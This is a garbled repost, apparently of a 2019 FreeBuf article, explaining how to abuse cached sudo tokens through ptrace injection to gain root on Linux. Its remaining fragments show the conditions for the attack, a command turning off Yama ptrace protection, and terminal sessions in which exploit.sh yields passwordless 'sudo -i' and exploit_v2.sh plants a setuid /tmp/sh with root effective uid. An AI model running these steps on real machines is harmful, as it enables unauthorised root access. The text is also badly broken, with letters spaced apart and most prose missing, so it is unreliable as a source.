[14061] 2019-05-03_分享两个sudotoken的使用技巧

文档创建者:s7ckTeam
浏览次数:6
最后更新:2025-01-18
2019-05-03_分享两个sudotoken的使用技巧 s u d o   t o k e n 使 A l p h a _ h 4 c k   F r e e B u f   2 0 1 9 - 0 5 - 0 3 s u d o r o o t s u d o / v a r / r u n / s u d o / t s / [ u s e r n a m e ] L i n u x s u d o 使 1   P t r a c e / p r o c / s y s / k e r n e l / y a m a / p t r a c e _ s c o p e   = =   0 2   s u d o u i d 1 5 1 5 使 s u d o s u d o E x p l o i t . s h S h e l l 使 s u d o s u d o S h e l l 使 使 R C E 使 s u d o s u d o $ s u d o   w h a t e v e r [ s u d o ] p a s s w o r d   f o r   u s e r :         #   P r e s s < c t r l > + c   s i n c e   y o u   d o n ' t   h a v e   t h e   p a s s w o r d .   #   T h i s   c r e a t e s   a n   i n v a l i d s u d o   t o k e n s . $   s h   e x p l o i t . s h . . . . w a i t   1   s e c o n d s $ s u d o   - i   #   n o   p a s s w o r d   r e q u i r e d   : ) #   i d u i d = 0 ( r o o t ) g i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t ) # e c h o   0   >   / p r o c / s y s / k e r n e l / y a m a / p t r a c e _ s c o p e #   # D o n ' t   w o r r y   t h i s   i s   n o t   p e r s i s t e n t   a c c r o s s   r e b o o t
1   s u d o s u d o   l s 2   使 使 e x p l o i t _ v 2 . s h / t m p / s h s u i d   s h e x p l o i t _ v 1 e x p l o i t _ v 2 . s h *   n o n g i a c h F B A l p h a _ h 4 c k F r e e B u f . C O M $ . / e x p l o i t _ v 2 . s h C u r r e n t p r o c e s s   :   2 4 4 1 c h m o d : c h a n g i n g   p e r m i s s i o n s   o f   ' a c t i v a t e _ s u d o _ t o k e n ' :   O p e r a t i o n   n o t   p e r m i t t e d I n j e c t i n g p r o c e s s   1 7 2 1   - >   b a s h I n j e c t i n g p r o c e s s   2 4 3 3   - >   b a s h c a t : / p r o c / 2 4 4 6 / c o m m :   N o   s u c h   f i l e   o r   d i r e c t o r y I n j e c t i n g p r o c e s s   2 4 4 6   - > $ / t m p / s h   - p #   i d u i d = 1 0 0 1 ( t e s t ) g i d = 1 0 0 1 ( t e s t )   e u i d = 0 ( r o o t )   e g i d = 0 ( r o o t )   g r o u p s = 0 ( r o o t ) , 1 0 0 1 ( t e s t )

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则